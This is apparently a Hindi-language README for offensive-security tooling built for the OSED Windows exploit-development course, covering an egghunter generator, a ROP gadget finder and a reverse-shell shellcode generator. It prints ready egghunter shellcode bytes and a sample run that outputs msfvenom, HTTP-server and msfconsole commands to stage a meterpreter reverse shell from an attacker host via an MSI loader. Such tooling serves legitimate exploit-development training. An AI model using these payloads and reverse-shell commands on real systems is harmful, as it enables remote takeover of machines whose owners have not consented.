
Offensive Security के Windows Usermode Exploit Dev पाठ्यक्रम (OSED) के लिए विशेष टूलिंग
ऑफेंसिव सिक्योरिटी के Windows Usermode Exploit Dev कोर्स (OSED) के लिए विशेष टूलिंग
pip3 install keystone-engine numpy
आवश्यक है keystone-engine
usage: egghunter.py [-h] [-t TAG] [-b BAD_CHARS [BAD_CHARS ...]] [-s]
Creates an egghunter compatible with the OSED lab VM
optional arguments:
-h, --help show this help message and exit
-t TAG, --tag TAG tag for which the egghunter will search (default: c0d3)
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to check for in final egghunter (default: 00)
-s, --seh create an seh based egghunter instead of NtAccessCheckAndAuditAlarm
डिफ़ॉल्ट egghunter जनरेट करें
./egghunter.py
[+] egghunter created!
[=] len: 35 bytes
[=] tag: c0d3c0d3
[=] ver: NtAccessCheckAndAuditAlarm
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x63\x30\x64\x33\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
w00tw00t टैग के साथ egghunter जनरेट करें
./egghunter.py --tag w00t
[+] egghunter created!
[=] len: 35 bytes
[=] tag: w00tw00t
[=] ver: NtAccessCheckAndAuditAlarm
egghunter = b"\x66\x81\xca\xff\x0f\x42\x52\x31\xc0\x66\x05\xc6\x01\xcd\x2e\x3c\x05\x5a\x74\xec\xb8\x77\x30\x30\x74\x89\xd7\xaf\x75\xe7\xaf\x75\xe4\xff\xe7"
बैड कैरेक्टर्स की जाँच करते हुए SEH-आधारित egghunter जनरेट करें (यह शेलकोड को नहीं बदलता, वह मैन्युअली करना होता है)
./egghunter.py -b 00 0a 25 26 3d --seh
[+] egghunter created!
[=] len: 69 bytes
[=] tag: c0d3c0d3
[=] ver: SEH
egghunter = b"\xeb\x2a\x59\xb8\x63\x30\x64\x33\x51\x6a\xff\x31\xdb\x64\x89\x23\x83\xe9\x04\x83\xc3\x04\x64\x89\x0b\x6a\x02\x59\x89\xdf\xf3\xaf\x75\x07\xff\xe7\x66\x81\xcb\xff\x0f\x43\xeb\xed\xe8\xd1\xff\xff\xff\x6a\x0c\x59\x8b\x04\x0c\xb1\xb8\x83\x04\x08\x06\x58\x83\xc4\x10\x50\x31\xc0\xc3"
उपयोगी गैजेट्स खोजता है और उन्हें वर्गीकृत करता है। केवल सबसे साफ उपलब्ध गैजेट्स को टर्मिनल पर प्रिंट करता है (जो खोजा जा रहा है और अंतिम ret निर्देश के बीच न्यूनतम मात्रा में कचरा)। आगे की खोज के लिए सभी गैजेट्स एक टेक्स्ट फ़ाइल में लिखे जाते हैं।
आज (3 जून 2021) मैंने पाया कि ropper (और ROPGadget भी) एक ऐसा गैजेट खोजने में विफल रहते हैं जो rp++ खोज लेता है (इससे मुझे चैलेंज #2 में कठिनाई हुई, क्योंकि एक add गैजेट था जिसे ropper ने आसानी से नहीं देखा)।
चूंकि find-gadgets ropper api का उपयोग करता है, मैंने find-gadgets को अपडेट किया ताकि वह rp++ गैजेट्स को भी शामिल कर सके। फिलहाल, ropper द्वारा न खोजे गए rp++ गैजेट्स को 'all gadgets' फ़ाइल (डिफ़ॉल्ट रूप से found-gadgets.txt) में जोड़ा जाता है, और 'clean gadgets' फ़ाइल (डिफ़ॉल्ट रूप से found-gadgets.txt.clean) में वर्गीकृत नहीं किए जाते हैं। तो, कवरेज है, बस अच्छी तरह से एकीकृत नहीं है। हो सकता है कि मैं इसे फिर से देखूँ और rp++ आउटपुट को भी वर्गीकृत करवाऊँ, या नहीं भी।
usage: find-gadgets.py [-h] -f FILES [FILES ...] [-b BAD_CHARS [BAD_CHARS ...]] [-o OUTPUT]
Searches for clean, categorized gadgets from a given list of files
optional arguments:
-h, --help show this help message and exit
-f FILES [FILES ...], --files FILES [FILES ...]
space separated list of files from which to pull gadgets (optionally, add base address (libspp.dll:0x10000000))
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to omit from gadgets, e.g., 00 0a (default: empty)
-o OUTPUT, --output OUTPUT
name of output file where all (uncategorized) gadgets are written (default: found-gadgets.txt)
कई फ़ाइलों में गैजेट्स खोजें (एक dll द्वारा पसंद किए गए ऑफसेट से भिन्न ऑफसेट पर लोड होता है) और सभी गैजेट्स से 0x0a और 0x0d को हटाएँ

आवश्यक है keystone-engine
वैकल्पिक msi लोडर के साथ रिवर्स शेल बनाता है
usage: shellcode.py [-h] [-l LHOST] [-p LPORT] [-b BAD_CHARS [BAD_CHARS ...]] [-m] [-d] [-t] [-s]
Creates shellcodes compatible with the OSED lab VM
optional arguments:
-h, --help show this help message and exit
-l LHOST, --lhost LHOST
listening attacker system (default: 127.0.0.1)
-p LPORT, --lport LPORT
listening port of the attacker system (default: 4444)
-b BAD_CHARS [BAD_CHARS ...], --bad-chars BAD_CHARS [BAD_CHARS ...]
space separated list of bad chars to check for in final egghunter (default: 00)
-m, --msi use an msf msi exploit stager (short)
-d, --debug-break add a software breakpoint as the first shellcode instruction
-t, --test-shellcode test the shellcode on the system
-s, --store-shellcode
store the shellcode in binary format in the file shellcode.bin
❯ python3 shellcode.py --msi -l 192.168.49.88 -s
[+] shellcode created!
[=] len: 251 bytes
[=] lhost: 192.168.49.88
[=] lport: 4444
[=] break: breakpoint disabled
[=] ver: MSI stager
[=] Shellcode stored in: shellcode.bin
[=] help:
Create msi payload:
msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.49.88 LPORT=443 -f msi -o X
Start http server (hosting the msi file):
sudo python -m SimpleHTTPServer 4444
Start the metasploit listener:
sudo msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST 192.168.49.88; set LPORT 443; exploit"
Remove bad chars with msfvenom (use --store-shellcode flag):
cat shellcode.bin | msfvenom --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00\x0a\x0d\x25\x26\x2b\x3d" -f python -v shellcode